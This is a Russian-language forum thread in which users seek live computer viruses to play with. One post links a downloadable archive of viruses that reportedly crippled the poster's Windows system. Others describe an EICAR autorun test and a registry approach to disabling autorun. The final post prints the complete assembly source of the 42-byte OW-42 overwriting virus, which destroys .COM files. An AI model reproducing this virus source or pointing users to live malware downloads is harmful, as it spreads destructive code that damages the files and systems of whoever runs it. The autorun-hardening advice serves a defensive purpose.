А в нете негде?
Я вот тут прочитал http://habrahabr.ru/blogs/virus/69403
пишут, что есть интересный вирусяк, который используя дырку в эксплорере сам запускается при входе в папку.
Вот ченить такое бы.
Ну, если такого нету, то хоть какойнить.
Через 10 минут http://cynicmansion.ru/virus.tar.gz
Что именно делают - не знаю. У меня поотрубали доступ к менюшкам в эксплорере, а при запуске сразу всех вообще винду убили.
Ещё где-то был фейковый антивирус, нужно поискать. Назывался вроде CoreGuardAntivirus.
Скачиваете eicar.com (на время скачивания антивирус отключается).
Кладете в корень флешки и туда же autorun.inf
[autorun]
open=eicar.com
При втыкании флешки в компьютер антивирус должен ругаться.
Также откройте для себя полное отключение автозапуска
Импортируете *.reg файл.
DISCLAYMER - Файл приводится как есть.
Я не несу никакой ответственности за любые проблемы,
возникшие на компьютере вследствие импорта нижеуказанного reg файла.
>>После этого даже втыкание флэшки с вирусами в компьютер ни к чему не должно приводить
> До тех пор пока ты не воткнёшь две флешки или флешку которую винда распознает как новое устойство, и винда исправит ошибку внесённую пользователем.
Указанный файл отключает автозагрузку в четырех местах и чистит кэш ранее подключенных флэшек. Я еще пока не сталкивался с тем, чтобы эти ключи автоматически восстановились.
Согласен, ни в чем нельзя быть уверенным до конца.
Можете, например, попробовать под WinXP SP3 переименовать (но на всякий случай не удалять) файл c:\windows\system32\sort.exe в sorta.exe . И увидите, как в течение минуты снова из пепла возродиться файл sort.exe.
Надеюсь Microsoft не выпустит патч, которых заставит winlogon.exe, помимо восстановления файлов, восстанавливать возможность автозапуска вирусов.
расскопал таки свои архивы далёкого 95-го года. весёлое было время. вот вам самый простенький из коллекции — целых 42 байта, портит только com-ы. интерессно, оно под виндой заведётся?
;OW-42 virus - TridenT group, edited for Crypt Newsletter 13
;
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE, SS:NOTHING
org 0100h
start: mov ah,4Eh ; find first file
recurse:
mov dx,0123h ; matching filemask, "*.*"
int 21h
db 72h,20h ;hand-coded jump on carry to
;exit if no more files found
mov ax,3D01h
mov dx,009Eh
int 21h
mov bh,40h
mov dx,0100h ;starting from beginning
xchg ax,bx ;put handle in ax
mov cl,2Ah ;to write: 42 bytes of virus
int 21h ;write the virus
mov ah,3Eh ;close the file
int 21h
mov ah,4Fh ;find next file
jmp Short recurse
db "*.COM" ;file_mask
dw 0C300h ;hand-coded return
CODE ENDS
END START